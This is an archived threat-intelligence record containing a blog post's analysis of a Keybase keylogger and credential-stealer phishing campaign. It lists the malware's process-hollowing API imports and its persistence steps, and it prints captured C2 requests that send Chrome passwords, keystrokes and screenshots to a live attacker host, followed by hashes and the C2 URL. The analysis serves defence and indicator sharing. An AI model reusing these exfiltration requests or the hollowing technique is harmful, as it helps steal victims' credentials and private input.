{ "id": "c11b6364-db85-4f6c-846a-f7ae77d5a377", "created_at": "2026-04-06T00:06:56.322603Z", "updated_at": "2026-04-10T03:21:22.493307Z", "deleted_at": null, "sha1_hash": "6344461bfc916bae830a22bfe1d08ea3134e95a7", "title": "Keybase Logger/Clipboard/CredsStealer campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 546671, "plain_text": "Keybase Logger/Clipboard/CredsStealer campaign\r\nArchived: 2026-04-05 22:53:09 UTC\r\nWhile checking my email another day i came across a phish email that seemed quite suspicious. see below:\r\nIt came with compressed file named Product_details.gz. when extracted; it presented a file named Payment_45476.scr.\r\nThis file is windows executable which was .net compiled, The file was then opened with a tool called ILSPY in order\r\nto analyze its inner workings.\r\n- Looking at its main function it seems it created two threads:\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 1 of 7\n\nThe function below looks to be using a primitive form of obfuscation that consist on reversing  strings.\r\nLooking at the function below; the malware uses an Encryption class that handles the decryption of several strings\r\nfound throughout the code see below.\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 2 of 7\n\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 3 of 7\n\nLooking at the function below, it seems it invokes the DecryptText function declared on the Encryption class.\r\nThe decoded data corresponds the imports the malware will be using:\r\nCreateProcessA  \r\nGetThreadContext \r\nSetThreadContext \r\nWow64SetThreadContext \r\nReadProcessMemory \r\nWriteProcessMemory \r\nNtUnmapViewOfSection \r\nVirtualAllocEx \r\nResumeThread\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 4 of 7\n\nWhen this sample was executed it was clear the sample had malicious intents.It established persistence by copying\r\nitself to the startup folder and setting the autorun registry key at startup. The malware names itself \"Important.exe\"\r\n which on looking at the code it seems a static value set by the author. see below for registry and file activity.\r\n [CreateFile] Payment_45476.exe:1316 \u003e %AllUsersProfile%\\Important.exe [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]\r\n [RegSetValue] Payment_45476.exe:1316 \u003e HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\50057d8e6fa9271dc2110b90\r\nThe malware then starts to reach out to its c2. The requests indicate the malware has the following capabilities:\r\nTakes a screenshot of the current working window\r\nActs as a keylogger and credential stealer.\r\nCaptures clipboard content. \r\n GET /wp-includes/css/keybase/post.php?type=notification\u0026machinename=PETERPC\u0026machinetime=11:58%20PM\r\n HTTP/1.1\r\n \"steals passwords from chrome password cache\"\r\n GET /wp-includes/css/keybase/post.php?type=passwords\u0026machinename=PETERPC\u0026application=Chrome\u0026link=http://gsl8411.ru\r\n HTTP/1.1\r\n \"it has keylogging capabilities\"\r\n GET /wp-includes/css/keybase/post.php?type=keystrokes\u0026machinename=PETERPC\u0026windowtitle=Filter\u0026keystrokestyped=tests\r\n HTTP/1.1\r\n POST /wp-includes/css/keybase/image/upload.php HTTP/1.1\r\n Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930\r\n Host: examgist.com\r\nOn looking further to the c2 callbacks, it was noticed the locations in which the screenshots were shared was world\r\nreadable. See sample below:\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 5 of 7\n\nThe login panel was also available :\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 6 of 7\n\nIn conclusion ,this malware is considered primitive based on its design. however, it can certainly cause damage  its\r\nkelogging, screen sharing  and credential stealing capabilities make it very attractive to skiddies. thank you for\r\nreading\r\nMD5:\r\n7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr\r\n398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr\r\n78c4256eb2003db620a45adba44f404c  Order_34002.gz\r\n9dada7b67f5066e6f5d394222240beb9  Product_details.gz\r\nC2:\r\nhttp://examgist[.]com/wp-includes/css/keybase/login.php\r\nVT:\r\nhttps://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/\r\nSource: https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html" ], "report_names": [ "keybase-loggerclipboardcredsstealer.html" ], "threat_actors": [], "ts_created_at": 1775434016, "ts_updated_at": 1775791282, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6344461bfc916bae830a22bfe1d08ea3134e95a7.pdf", "text": "https://archive.orkl.eu/6344461bfc916bae830a22bfe1d08ea3134e95a7.txt", "img": "https://archive.orkl.eu/6344461bfc916bae830a22bfe1d08ea3134e95a7.jpg" } }